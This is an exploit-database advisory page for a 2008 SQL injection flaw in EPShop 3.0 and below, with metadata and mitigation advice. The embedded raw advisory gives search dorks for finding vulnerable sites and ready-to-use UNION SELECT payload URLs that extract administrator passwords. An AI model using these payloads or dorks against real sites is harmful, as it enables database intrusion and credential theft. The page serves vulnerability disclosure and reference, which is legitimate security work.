header-logo
Suggest Exploit
vendor:
EPShop
by:
mikeX
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EPShop
Affected Version From: 3.0 and below
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

EPShop < 3.0 (pid) Remote SQL Injection Vulnerability

EPShop version 3.0 and below is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of EPShop
Source

Exploit-DB raw data:

########################################################################################
#
# [+]  Name   : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability
# [+]  Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com
# [+]  Dork(s): ?action=pro_show and ?action=disppro
# [+]  Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo
#
########################################################################################


Information;

    You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop
    They stopped supporting the old version a while ago.

Exploit;

    SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection]
    SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection]

Live Examples;

    http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
    http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--

# milw0rm.com [2008-07-26]